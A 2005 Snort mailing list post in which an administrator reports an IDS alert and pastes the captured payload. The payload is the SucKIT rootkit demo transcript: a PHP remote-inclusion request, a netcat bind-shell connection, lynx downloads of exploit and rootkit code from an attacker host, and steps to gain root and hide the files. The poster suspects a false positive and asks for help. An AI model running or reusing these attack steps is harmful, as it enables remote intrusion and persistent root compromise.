Snort mailing list archives
ATTACK-RESPONSES id check returned root
From: Chris Romano <romano.chris () gmail com>
Date: Fri, 21 Oct 2005 13:12:20 -0400
I came in this moring and checked my snort alerts (morning routine), and noticed the following: ATTACK-RESPONSES id check returned root 2005-10-21 07:40:32 82.165.25.125:80<http://82.165.25.125:80> 10.10.10.5:51949 <http://10.10.10.5:51949> TCP Some background. 10.10.10.x is my dmz and 10.10.10.5 <http://10.10.10.5> is a firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our 192.168.0.x internal network. So I started digging around. The alert logged the following: SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit *.* (c)oded by sd () sf cz & devik () cdi cz, 2001 Configuring ./sk:.OK!.[attacker () badass cz ~/sk10]$ telnet lamehost.com<http://lamehost.com> 80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character is '^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3 HTTP/1.1.Host: lamehost.com <http://lamehost.com> ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001 04:04:52 GMT.Server: Apache/1.3.14 (Unix) (Red-Hat/Linux) PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT.ET <http://GMT.ET>ag: "31c6-c2-3bb3ffba".Content-Type: text/html..IT WERKS! Shell at port 8193 Connection closed by foreign host..[attacker () badass cz~/sk10]$ nc -v lamehost.com <http://lamehost.com> 8193.lamehost.com<http://8193.lamehost.com>[ 192.168.0.2 <http://192.168.0.2>] 8193 (?) open.w.12:08am up 1:20, 3 users, load average: 0.05, 0.06,0.08.USER TTY FROM LOGIN@IDLE JCPU PCPU AT.roottty1 - 11:58pm 39:03 3.15s 2.95s bash.cd <http://bash.cd> /tmp.lynx -dump http://badass.cz/s.c > <http://badass.cz/s.c>>; s.c.gcc s.c o super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root) gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd .l33t.lynx -dump http://badass.cz/~attacker/sk10/s k > sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w Ok, there a few things that make me think that this is a false positive. First is the "192.160.0.02 <http://192.160.0.02>" IP. That is not on this network. Second, There is no host on 192.168.0.2 <http://192.168.0.2>. Third, I do not have any Red Hat machines. They are all Slackware. I am still concerned. I searched for "sk" and all I found are two directories related to vim and I didn't find a directory called "l33t". Can anyone help me out? Thanks, Chris
Current thread:
- ATTACK-RESPONSES id check returned root Chris Romano (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Matt Kettler (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Matt Kettler (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Patrick Walsh (Oct 21)
- Re: ATTACK-RESPONSES id check returned root Chris Romano (Oct 21)
- Re: ATTACK-RESPONSES id check returned root cc (Oct 21)
- RE: ATTACK-RESPONSES id check returned root Our World Is Here (Oct 24)
- RE: ATTACK-RESPONSES id check returned root Paul Schmehl (Oct 25)
- RE: ATTACK-RESPONSES id check returned root Our World Is Here (Oct 26)
- RE: ATTACK-RESPONSES id check returned root Our World Is Here (Oct 24)
- <Possible follow-ups>
- RE: ATTACK-RESPONSES id check returned root Willy, Andrew (Oct 21)